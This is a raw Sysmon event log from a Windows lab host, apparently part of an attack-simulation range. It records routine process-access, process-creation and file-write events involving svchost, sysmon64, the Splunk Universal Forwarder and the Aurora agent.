12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017964Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017963Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017962Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017961Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017960Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E5B1-63C7-2702-00000000B002}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017959Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B1-63C7-2702-00000000B002}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017958Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.155{E5A8D418-E5B1-63C7-2702-00000000B002}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018008Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.915{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=18D0DB8D53BFC6DDBFADEE72D33996AF,SHA256=5229CC76E2746FBDAA28BF4B8C9BA36891C5E0190A3BC15E72EB2351F58105D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018007Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.588{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018006Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.588{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018005Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.588{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018004Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.587{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018003Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.587{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018002Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.587{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 23542300x800000000000000018001Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.573{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEE38FCFC7568754A774EE9BD336D26E,SHA256=F4B3F68820EAF6A0666AC92B2FD28C95A3EC3531175B47D4B4122DF70C0E3711,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018000Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017999Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017998Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017997Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017996Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017995Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017994Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017993Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017992Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017991Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017990Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017989Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.496{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 